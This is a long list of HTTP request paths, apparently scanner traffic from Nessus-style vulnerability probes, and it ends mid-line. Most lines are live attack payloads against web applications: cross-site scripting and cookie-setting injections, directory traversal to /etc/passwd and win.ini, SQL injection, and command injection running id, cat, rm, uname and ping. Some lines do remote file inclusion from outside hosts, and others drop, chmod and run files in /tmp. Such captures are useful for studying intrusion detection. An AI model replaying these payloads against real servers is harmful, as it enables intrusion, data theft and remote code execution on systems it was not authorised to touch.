content=\"testtbjy=7334\">\n/0w155a7c.cfc?<script>cross_site_scripting.nasl</script>\n/jnv890lt.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/bb-hist.sh?histfile=../../../../../etc/passwd\n/top.php?stuff='del q24953383 #\n/main.php?logout='sleep 10 #\n/nosuchurl/><script>alert('vulnerable')</script>\n/top.php?stuff=\"&ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/'dailyfed/\n/examples/jsp/sessions/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/a0imiuf1.dll?<script>document.cookie=\"testxqrn=4654;\"</script>\n/javascript/htpasswd.pfx\n/vjbrrppi.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ygkjkngd.kspx?<script>document.cookie=\"testnago=4518;\"</script>\n/examples/jsp/cal/index.php?id=0rop9yeuxw'\n/javascript/styles.exe\n/main.php?logout=\"&ping;-w;10000;-n;1;4.3.2.1&rem;\n/examples/jsp/jsp2/jspx/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/m5103snj.htm?<script>cross_site_scripting.nasl</script>\n/o6ebbirj.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/examples/jsp/error/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/javascript/component.exe\n/cgi-bin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/main.php?logout=\"|ping,-w,7000,-n,1,1.2.3.4|rem,\n/examples/jsp/jsp2/el/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/en-us/account/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/user.php?caselist[bad_file.txt][path]=@rfiurl&command=cat /etc/passwd\n/uvazfs7p.jsp?<script>document.cookie=\"testwtbo=4831;\"</script>\n/main.php?logout=\"&ping;-w;8000;-n;1;1.2.3.4&rem;\n/d44uk9h2.jspa?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/n.exe\n/gm_scripting/\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/jdvccfaqtd0;').\"]=1\n/main.php?logout=\";uname >q32339726 #\n/1r8cfrlf.cgi?<script>document.cookie=\"testydan=5106;\"</script>\n/en-us/s7qus4g3.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/ipb5ri?'\n/0rufe52p.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-sys/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/recordings/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/scripts/c0kha6w3apd3.cgi\n/script/fckeditor/editor/filemanager/browser/default/frmupload.html\n/lsoix5h3.exe?<script>cross_site_scripting.nasl</script>\n/horde/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cegnlginfc.sh;echo|awstats842638.txt\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/scripts/tinfo.php?id=1332010409\n/subscriptions.jsp\n/jdx255ea.htm?<script>document.cookie=\"testziyq=5055;\"</script>\n/i7prbs22.dll?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/main.php?stuff=&rm;q66756841&rem;\n/dir_thatware/config.php?root_path=http://cirt.net/rfiinc.txt?'\n/examples/jsp/jsp2/el/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/fpnpp5zg.nsf?<script>document.cookie=\"testyias=101;\"</script>\n<script>document.cookie=\"testfutf=1550;\"</script>\n/manager/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/cgi-exe/htimage.exe/path/filename?2,2\n/top.php?stuff=\"uname\\x09>q19771951\\x09#\n/examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/h5sc3gxy.pl?<script>cross_site_scripting.nasl</script>\n/cgi-914/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/main.php?logout=\"\\x0dsleep 9 #\n/examples/jsp/num/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/./tmp/gjvtlghpjb0 > /dev/null &;echo|awstats573600.txt\n/main.php?logout=&uname\\x09>q21614636\\x09#\n/examples/jsp/jsp2/jspx/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/hipkz026.dll?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scriptless/\n/nyvbv05h.dll?<script>document.cookie=\"testftxz=5980;\"</script>\n/index.php?configfile=../../../../../../../../../etc/passwd\n/calendar.php?week=\"><script>alert(410285570375)</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+10+00+00+00+20+00+00+00+00+40+00+00+10+00+00+00+02+00+00+04+00+00+00+00++>>ctdn\n/javascript/htpasswd.as\n/\"free market\"/\n/phpmyadmin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/en-us/account/login?return_to=/en-us/manager/launcher/admin/directory?app_only=1&ns=xss\n/help.php?q=ver,>q99682555&rem,\n/l752x1ry.asp?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0ddel\\x09q39919215\\x09#\n/en-us/h5sc3gxy.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yver8r9o.pl?<script>cross_site_scripting.nasl</script>\n/recordings/tombstone.cfm?profileid=<script>foo</script>\n/help.php?q=\"rm q85487167&rem \n/en-us/33y9gcqq.htm?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/en-us/n9xlumt5.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/search/show.pl?url=http://www.google.com\n/examples/servlets/servlet/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/examples/jsp/sessions/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/notify?from=nessus\"|id\"\n/fmnveedu.x?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/d5a5renl.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ju0u7kfo.php3?<script>cross_site_scripting.nasl</script>\n/javascript/document.manifest\n/?<script>document.cookie=\"testxeoi=3573;\"</script>\n/cgi-915/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/fnwhrxyd.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/..\\..\\..\\\n/scripts/carello/carello.dll\n/examples/jsp/error/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/recordings/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/l4fz1dqw.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/transparent.exe\n/dda2qr7j.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.tgz\n/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/esmozg5d.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/mylog.html?screen=/etc/passwd\n/bmeun223.php?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/recordings/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/scripts/admin.pl\n/en-us/<script>document.cookie=\"testyrbs=2855;\"</script>\n/javascript/.passwd/\n/ghswfouu.nsf?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/sessiondescriptionprotocol/\n/h4bi26jd.cgi?<script>document.cookie=\"testhrzx=1150;\"</script>\n/scripts/index.php?board=nonexistant1391471476\n/static//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd\n/! cabella's big game hunter - alaskan adventure/\n/cgi-bin/search/show.pl?url=file:/etc/passwd\n/yef5f3d5.pl?<script>document.cookie=\"testcrcv=6167;\"</script>\n/javascript/creator.exe\n/v3axg1p8.dll?<script>document.cookie=\"testxagh=6987;\"</script>\n/egaet53a.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/2pwudii1mt22.asp\n/yver8r9o.dll?<script>cross_site_scripting.nasl</script>\n/?<script>document.cookie=\"testrluj=1420;\"</script>\n/ddoworrl.jsp?<script>document.cookie=\"testvlau=8517;\"</script>\n/examples/jsp/jsp2/el/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/main.php?stuff='\\x0drm\\x09q61875212\\x09#\n/um7xpn15.php3?<script>document.cookie=\"testotoy=6142;\"</script>\n/help.php?q=\"&del q34212187 #\n/scgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/javascript/htdocs.exe\n/examples/jsp/sessions/cwmail.exe\n/jujgxwav.pl?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/cgi-bin/index.asp?user='\n/index.php?id=h6xj4vcok1'\n/javascript/pivot.exe\n/miz4r5hz.mscgi?<script>document.cookie=\"testviqu=1270;\"</script>\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/scripts/cc_guestbook.pl\n//</p><body><script/src=\"http://www.example.com/test?rnd=q29486681\"></script><p>\n/azcrfs8d.mscgi?<script>document.cookie=\"testjpdr=9205;\"</script>\n/t-script_4/\n/javascript/author.exe\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1; passthru('id'); die\n/examples/jsp/num/wikka.php?wakka=homepage/../../actions/wikkachanges\n/phpmyadmin/shoutbox.php?conf=../\n/jw64yq8u.idc?<script>document.cookie=\"testylfu=1313;\"</script>\n/javascript/clk.exe\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q68315591&frm_user=&scr_height=&scr_width=\n/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/main.php?logout='uname >q44999749 #\n/aj3pf49c.x?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/examples/jsp/sessions/index.php?cat_select=<script>foo</script>\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,475189625,0,0,0,0,0--\n/phpmyadmin/download.php?language=/etc/passwd\\x00\n/cgi-bin/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/directory.php?dir=;cat /etc/passwd\n/examples/jsp/cal/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/ows-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/scripts/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/scripts/ui/login?user=nessus-1331908665\n/main.php?stuff=\"rm\\x0bq47639929&rem\\x0b\n/h5sc3gxy.jsp?<script>cross_site_scripting.nasl</script>\n/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/fmnveedu.php?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/javascript/test2.exe\n/examples/jsp/jsp2/jspx/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/faq.php?action=&type=view&s=&id=-1' union select 0,1451427823,0,0,0,0,0--\n/cgi-bin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/javascript/document.jhtml\n/en-us/i686v90l.html?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/dagent/downloadreport.asp?agentid=1111&pass=2;select plus_downloadreport_sql_injections.nasl\n/h5sc3gxy.idc?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='rm q95495989 #\n/xsqln7eb.html?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/en-us/account/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/main.php?logout=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/fmnveedu.cfm?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/u8yiqilu.pl?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/5qnlm5z2.cfc?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/t7tm4m0b.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/xmefwyizyj0;echo|awstats302824.txt\n/scripts/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/main.php?logout=\"&del,q77644543&rem,\n/l13b77e5.php3?<script>document.cookie=\"testjvvf=7721;\"</script>\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/x2gyorli.cgi?<script>document.cookie=\"testwhac=3130;\"</script>\n/help.php?q=\"ver\\x09>q57557316&rem\\x09\n/help.php?q='sleep 7 #\n/9o6g5vkn.cfm?<script>cross_site_scripting.nasl</script>\n/zln2hm2z.php3?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/rpc/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/recordings/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff='\\x0asleep\\x098\\x09#\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4d+24+03+34+9f+8b+7d+28+f3+a6+61+75+17+8b+55+f8+8b+4d+fc+66+8b+04+5a+0f+bf++>>esbq\n/examples/servlets/servlet/notify?from=nessus\"|id\"\n/b4vng02k.cfc?<script>document.cookie=\"testtrlh=3672;\"</script>\n/javascript/.passwd.pm\n/examples/jsp/checkbox/catalog.php?action=category_show&id='\n/javascript/document.test\n/scripts/index.php?string='\n/javascript/.htpasswd.sfish/`false`\n/bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/recordings/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd\n/javascript/document.php3\n/6wb70v0b.html?<script>cross_site_scripting.nasl</script>\n/brian's_guide/\n/cgi-bin/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/scripts/r.cgi?file=../../../../../../../../../../etc/passwd\n/sendcard.php?view=1&id='sendcard_sql.nasl\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~\n/3m5knyc4.do?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/phpmyadmin/passwd\n/afpl ghostscript_information/\n/scripts/samples/search/simple.idq\n<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/ifip-description/\n/main.php?stuff=\"|ping;-w;7000;-n;1;1.2.3.4|rem;\n/d44uk9h2.asp?<script>document.cookie=\"testmybc=2088;\"</script>\n/j4rdyhw8.pl?<script>document.cookie=\"testrluj=1420;\"</script>\n/cgi-home/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/main.php?stuff='del q94914736 #\n/examples/jsp/colors/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/d765w06j.jspa?<script>cross_site_scripting.nasl</script>\n//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+74+49+6e+66+68+4e+74+53+65+54+50+ff+54+24+38+50+8d+4c+24+30+6a+04+51+6a++>>ctdn\n/um7xpn15.nsf?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/main.php?stuff=\"rm\\x0cq43448647&rem\\x0c\n<script>document.cookie=\"testkwlg=5591;\"</script>\n/9ko6m4c8.html?<script>document.cookie=\"testylik=3403;\"</script>\n/bl8sefdm.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/edv3mapy.jsp?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/help_text_vars.php?pgv_base_directory=../../../../../../../../../etc/passwd\n/n9xlumt5.x?<script>cross_site_scripting.nasl</script>\n/en-us/h5sc3gxy.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/subscription-info/\n/recordings/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/javascript/limit.exe\n/y8pmygrp.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/tomcat_proxy_directory_traversal.nasl1332010414\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ezgnbzqprg.sh+>+/dev/null+&'); function v\n/examples/jsp/checkbox/search.php?submit=true&search=');\n/en-us/hipkz026.fts?<script>document.cookie=\"testyrbs=2855;\"</script>\n/?<script>document.cookie=\"testtbbe=856;\"</script>\n/main.php?logout=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/examples/jsp/checkbox/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/if69ddo1.cgi?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/i2n4v4rl.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-exe/gw5/gwweb.exe?help=bad-request\n/uvazfs7p.aspx?<script>document.cookie=\"testwtbo=4831;\"</script>\n/examples/jsp/sessions/core/editor.php?editor_insert_bottom=/etc/passwd\n/l13b77e5.exe?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/users/users.php\n/cgi.cgi/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/scripts/tinfo.php?id=1331904209\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/iroy1gvqrrqu??\n/?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/javascript/publications.exe\n/ewc3rz1l.dll?<script>document.cookie=\"testkgqo=204;\"</script>\n/javascript/ignore.exe\n/scripts/cleartrust/ct_logon.jsp?ctloginerrormsg=<script>alert(1)</script>\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://cirt.net/rfiinc.txt?\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- \n/javascript/transport.exe\n/javascript/document.exe\n/cgis/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/ap58k3ci.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<200603291315/\n/top.php?stuff=ver,>q18885325&rem,\n/eldredtranscript/\n/examples/jsp/checkbox/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/vwmg565s.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/reminder.exe\n/weq93ppb.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ngbfhgz5]));die;/*\n/main.php?logout=\"ping;-w;7000;-n;1;4.3.2.1|rem;\n/cacti/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/shopexd.asp?catalogid='42\n/cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd\\x00\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/examples/jsp/error/sendtemp.pl?templ=../../../../../etc/passwd\n/en-us/oie504mr.asp?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/adxmlrpc.php\n/main.php?logout=ver\\xa0>q14678363&rem\\xa0\n/cgi-sys/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/3hlysl2x.jspa?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/yef5f3d5.nsf?<script>document.cookie=\"testcrcv=6167;\"</script>\n/9kr0ih0v.mscgi?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/s7qus4g3.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tukodz3j.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&uname\\x09>q22899423\\x09#\n/help.php?q=\"ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/javascript/howto.exe\n/top.php?stuff=\\x0auname >q51153423 #\n/jujgxwav.cfc?<script>document.cookie=\"testknim=9383;\"</script>\n/examples/jsp/jsp2/el/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/main.php?logout='&rm q25729498 #\n/recordings/embed/day.php?path=/etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats544698.txt\n/en-us/9kr0ih0v.kspx?<script>document.cookie=\"testzgnm=1183;\"</script>\n/mv8wxfy9.kspx?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/javascript/gif.exe\n/scripts/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/scripts/slwebmail/showlogin.dll?language=fr\n/scriptsentry/\n/?<script>document.cookie=\"testwews=8477;\"</script>\n/javascript/23.exe\n/cancelsubscription/\n/en-us/33y9gcqq.dll?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331904249.php.\n<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/main.php?logout=\"rm\\x09q95413462&rem\\x09\n/phpmyadmin/documentation.html?phpmyadmin=file:///etc/passwd\n/s7qus4g3.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/javascript/icon.exe\n/um7xpn15.fts?<script>document.cookie=\"testotoy=6142;\"</script>\n/javascript/receive.exe\n/top.php?stuff=\";rm\\x09q51581738\\x09#\n/main.php?logout=\"|ping,-w,8000,-n,1,1.2.3.4|rem,\n/main.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/recordings/viewcvs.cgi/?cvsroot=<script>foo</script>\n/htbin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/description_subhead/\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm?'\n/javascript/interim.exe\n/javascript/decrypt.exe\n/tuwjta1w.dll?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/main.php?stuff='\\x0duname >q97623189 #\n/b5xdqgz2.php?<script>cross_site_scripting.nasl</script>\n/i2n4v4rl.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/demos/demo.browse.php?filename=/etc/passwd\n/top.php?stuff='\\x0arm q53951968 #\n/examples/jsp/jsp2/el/snpfiltered.pl?t=c&u=<script>foo</script>\n/examples/jsp/cal/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/en-us/h5sc3gxy.dll?<script>cross_site_scripting.nasl</script>\n/htdocs/../../../../../../../../../../../../../etc/passwd\n/l752x1ry.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=&ver\\x09>q12662543&rem\\x09\n/main.php?logout=\"&rm q75783223&rem \n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.96:8080/4dckqcc0acprbz??\n/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/examples/jsp/jsp2/el/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/help.php?q='\\x0drm\\x09q57419215\\x09#\n/0w155a7c.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b5xdqgz2.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/doc/index.php?s=/etc/passwd\\x00\n/main.php?stuff=ver\\x0c>q68677588&rem\\x0c\n/help.php?q=&ver\\xa0>q85836551&rem\\xa0\n/examples/jsp/colors/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/scripts/gtcatalog/password.inc\n/606wkcop.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/4dckqcc0acprbz?\n/cgi-win/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/examples/jsp/num/ftp/ftp.pl?dir=../../../../../../etc\n/examples/jsp/checkbox/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/0qhcnefz.do?<script>cross_site_scripting.nasl</script>\n/scripts/fgos1sb1c1tr.asp\n/8t9v8k7x.html?<script>document.cookie=\"testhvje=9403;\"</script>\n/byrg33fw.asp?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/main.php?logout=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/en-us/33y9gcqq.asp?<script>document.cookie=\"testnvxc=4301;\"</script>\n/jujgxwav.cgi?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/cacti/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/uvazfs7p.idc?<script>document.cookie=\"testwtbo=4831;\"</script>\n/en-us/9kr0ih0v.fts?<script>document.cookie=\"testzgnm=1183;\"</script>\n/scripts/search.jsp?q=%\"<script>alert(1331922005)</script>\n/viewimg.php?form=1&path=../../../../../../../../../../etc/passwd&var=1\n/cgi-bin/gw5/gwweb.exe?help=bad-request\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\\x00\n/main.php?logout=\"|ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/irssi-script/\n/main.php?stuff='\\x0dsleep\\x097\\x09#\n/doc/index.php?s=/etc/passwd\\x00\n/yacs/scripts/update_trailer.php?context[path_to_root]=@rfiurl?context[path_to_root]=@rfiurl?\n/bl8sefdm.fts?<script>cross_site_scripting.nasl</script>\n/main.php?logout=&ping;-w;8000;-n;1;1.2.3.4&rem;\n/fo564rei.kspx?<script>cross_site_scripting.nasl</script>\n/cacti/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/main.php?stuff=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/recordings/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/main.php?stuff=\"&del q33239588 #\n/main.php?stuff=ver;>q96335299&rem;\n/javascript/mem.exe\n/7uz3ok60.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/job descriptions/\n/scripts/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/quagynka.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/scripts/news/index.dot?id=../../../../../../../../../../../..//boot.ini\\x00.jpg\n/azcrfs8d.cfm?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/scripts/cxvae_g3rjys.php\n/scripts/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/cgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/scripts/calendar.php?month=' union select 1,1,'1332008330','calendarix_month_sql_injection.nasl',1 #\n/7dbjwpw6.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.part\n/examples/jsp/num/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/phpmyadmin/documentation.html?phpmyadmin=/../..//../..//../..//../..//../..//etc/passwd\\x00\n/mcptranscript/\n/javascript/.htaccess.sfish/\"`false`\"\n/test.php?evalme=eval($_server[http_x_durgqrrwohhdlkkqd]);\n/scripts/nckowqpd4zng.php3\n/help.php?q='\\x0duname >q95327467 #\n/examples/jsp/checkbox/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat 